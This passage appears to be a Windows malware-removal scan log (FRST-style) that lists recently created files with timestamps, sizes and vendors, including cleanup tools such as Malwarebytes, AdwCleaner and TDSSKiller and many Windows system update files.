2017-01-08 11:00 - 2017-01-08 11:01 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Owner\Downloads\mbar-1.09.3.1001.exe
2017-01-08 10:59 - 2017-01-08 10:59 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2017-01-08 10:50 - 2017-01-10 16:07 - 00000000 ____D C:\FRST
2017-01-08 10:44 - 2017-01-08 10:44 - 00000000 ____D C:\Users\Owner\Desktop\hunting down rootfiles reports
2017-01-08 10:41 - 2017-01-08 10:41 - 00852798 _____ C:\Users\Owner\Downloads\SecurityCheck.exe
2017-01-07 22:17 - 2017-01-08 16:34 - 00000000 ____D C:\AdwCleaner
2017-01-07 22:17 - 2017-01-07 22:17 - 03988944 _____ C:\Users\Owner\Downloads\AdwCleaner.exe
2017-01-07 21:51 - 2017-01-08 16:29 - 00001951 _____ C:\Users\Owner\Desktop\JRT.txt
2017-01-07 21:46 - 2017-01-07 21:48 - 01663040 _____ (Malwarebytes) C:\Users\Owner\Downloads\JRT.exe
2017-01-07 21:35 - 2017-01-10 00:01 - 00002432 _____ C:\Users\Owner\Desktop\Rkill.txt
2017-01-07 21:34 - 2017-01-07 21:34 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Owner\Downloads\iExplore.exe
2017-01-07 21:28 - 2017-01-08 19:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2017-01-07 21:25 - 2017-01-07 21:26 - 00791393 _____ (Lars Hederer ) C:\Users\Owner\Downloads\erunt-setup.exe
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsigncf631b6ff9651c8a
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignb4188614afff68b1
2017-01-04 23:26 - 2017-01-04 23:26 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign9c68d00380933832
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignc096e41f88628fbf
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign9eeea7640dd0c692
2017-01-04 23:25 - 2017-01-04 23:25 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign6e08fc3e0ff75b8f
2017-01-03 15:01 - 2017-01-03 15:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2017-01-03 14:57 - 2017-01-03 14:57 - 00001559 _____ C:\Users\Public\Desktop\iTunes.lnk
2017-01-03 14:57 - 2017-01-03 14:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2017-01-03 14:57 - 2017-01-03 14:57 - 00000000 ____D C:\Program Files\iPod
2016-12-25 23:07 - 2016-12-25 23:07 - 357362533 _____ C:\Users\Owner\Downloads\aaron griffin brushes.abr
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsignd3e98e4f088b7db6
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign4021b502d324f4a5
2016-12-25 23:05 - 2016-12-25 23:05 - 00000000 ____D C:\Users\Owner\AppData\Local\Tempzxpsign3b4c000cb30b224b
2016-12-24 13:55 - 2016-12-24 13:55 - 00000000 ____D C:\ProgramData\PC-Doctor, Inc
2016-12-21 16:49 - 2016-12-21 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-12-21 12:39 - 2017-01-10 00:43 - 00250816 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-21 12:39 - 2017-01-08 15:05 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2016-12-21 12:39 - 2017-01-08 11:01 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-12-21 12:39 - 2017-01-04 14:46 - 00081696 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2016-12-21 12:39 - 2017-01-01 21:57 - 00102856 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2016-12-21 12:39 - 2017-01-01 21:57 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-12-21 12:39 - 2016-12-21 12:39 - 00000932 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2016-12-21 12:39 - 2016-12-21 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2016-12-21 12:39 - 2016-12-14 12:55 - 00077416 _____ C:\Windows\system32\Drivers\mbae64.sys
2016-12-21 12:38 - 2016-12-21 12:38 - 00000000 ____D C:\Users\Owner\AppData\Local\Programs
2016-12-21 12:12 - 2016-12-21 12:27 - 54199488 _____ (Malwarebytes ) C:\Users\Owner\Desktop\mb3-setup-consumer-3.0.5.1299.exe
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00075888 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2016-12-21 10:15 - 2016-12-21 10:15 - 00042096 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2016-12-20 23:35 - 2016-09-12 13:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-12-20 23:35 - 2016-09-12 13:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-12-20 23:35 - 2016-09-09 07:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-12-20 23:30 - 2016-11-21 10:16 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-12-20 23:30 - 2016-11-21 10:16 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-12-20 23:30 - 2016-11-21 10:12 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00109568 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-12-20 23:30 - 2016-11-21 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2016-12-20 23:30 - 2016-11-20 08:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00084992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-12-20 23:30 - 2016-11-20 08:19 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-12-20 23:30 - 2016-11-20 08:04 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-12-20 23:30 - 2016-11-20 07:58 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-12-20 23:30 - 2016-11-20 07:57 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-12-20 23:30 - 2016-11-20 07:57 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-12-20 23:30 - 2016-11-20 07:52 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-12-20 23:30 - 2016-11-20 06:07 - 00467392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-12-20 23:30 - 2016-11-17 08:41 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-12-20 23:30 - 2016-11-14 15:27 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-12-20 23:30 - 2016-11-14 14:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-12-20 23:30 - 2016-11-12 11:48 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-12-20 23:30 - 2016-11-12 11:48 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-12-20 23:30 - 2016-11-12 11:28 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-12-20 23:30 - 2016-11-12 11:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-12-20 23:30 - 2016-11-12 11:26 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-12-20 23:30 - 2016-11-12 11:25 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-12-20 23:30 - 2016-11-12 11:25 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-12-20 23:30 - 2016-11-12 11:21 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-12-20 23:30 - 2016-11-12 11:15 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-12-20 23:30 - 2016-11-12 11:14 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-12-20 23:30 - 2016-11-12 11:09 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-12-20 23:30 - 2016-11-12 11:08 - 25759744 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-12-20 23:30 - 2016-11-12 11:08 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-12-20 23:30 - 2016-11-12 11:08 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-12-20 23:30 - 2016-11-12 11:07 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-12-20 23:30 - 2016-11-12 11:07 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-12-20 23:30 - 2016-11-12 10:56 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-12-20 23:30 - 2016-11-12 10:53 - 06049280 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-12-20 23:30 - 2016-11-12 10:52 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-12-20 23:30 - 2016-11-12 10:47 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-12-20 23:30 - 2016-11-12 10:41 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-12-20 23:30 - 2016-11-12 10:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-12-20 23:30 - 2016-11-12 10:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-12-20 23:30 - 2016-11-12 10:34 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-12-20 23:30 - 2016-11-12 10:31 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-12-20 23:30 - 2016-11-12 10:30 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-12-20 23:30 - 2016-11-12 10:29 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-12-20 23:30 - 2016-11-12 10:29 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-12-20 23:30 - 2016-11-12 10:29 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-12-20 23:30 - 2016-11-12 10:28 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-12-20 23:30 - 2016-11-12 10:27 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-12-20 23:30 - 2016-11-12 10:20 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-12-20 23:30 - 2016-11-12 10:20 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-12-20 23:30 - 2016-11-12 10:19 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-12-20 23:30 - 2016-11-12 10:17 - 20302848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-12-20 23:30 - 2016-11-12 10:15 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-12-20 23:30 - 2016-11-12 10:14 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-12-20 23:30 - 2016-11-12 10:11 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-12-20 23:30 - 2016-11-12 10:10 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-12-20 23:30 - 2016-11-12 10:08 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-12-20 23:30 - 2016-11-12 10:08 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-12-20 23:30 - 2016-11-12 10:03 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-12-20 23:30 - 2016-11-12 09:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-12-20 23:30 - 2016-11-12 09:56 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-12-20 23:30 - 2016-11-12 09:52 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-12-20 23:30 - 2016-11-12 09:51 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-12-20 23:30 - 2016-11-12 09:49 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-12-20 23:30 - 2016-11-12 09:47 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-12-20 23:30 - 2016-11-12 09:41 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-12-20 23:30 - 2016-11-12 09:40 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-12-20 23:30 - 2016-11-12 09:38 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-12-20 23:30 - 2016-11-12 09:37 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-12-20 23:30 - 2016-11-12 09:36 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-12-20 23:30 - 2016-11-12 09:36 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-12-20 23:30 - 2016-11-12 09:35 - 02920960 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-12-20 23:30 - 2016-11-12 09:21 - 13653504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-12-20 23:30 - 2016-11-12 09:20 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-12-20 23:30 - 2016-11-12 09:11 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-12-20 23:30 - 2016-11-12 09:05 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-12-20 23:30 - 2016-11-12 09:02 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-12-20 23:30 - 2016-11-12 09:02 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-12-20 23:30 - 2016-11-10 08:32 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-12-20 23:30 - 2016-11-10 08:19 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-12-20 23:30 - 2016-11-09 08:41 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-12-20 23:30 - 2016-11-09 08:33 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-12-20 23:30 - 2016-11-09 08:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-12-20 23:30 - 2016-11-09 08:17 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-12-20 23:30 - 2016-11-09 08:02 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-12-20 23:30 - 2016-11-09 07:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-12-20 23:30 - 2016-11-06 08:33 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-12-20 23:30 - 2016-11-06 08:16 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-12-20 23:30 - 2016-11-06 08:01 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-12-20 23:30 - 2016-10-27 07:33 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2016-12-20 23:30 - 2016-10-27 07:20 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2016-12-20 23:30 - 2016-10-11 07:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-12-20 23:30 - 2016-10-11 07:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-12-20 23:30 - 2016-10-11 07:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-12-20 23:30 - 2016-10-11 07:34 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-12-20 23:30 - 2016-10-11 07:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
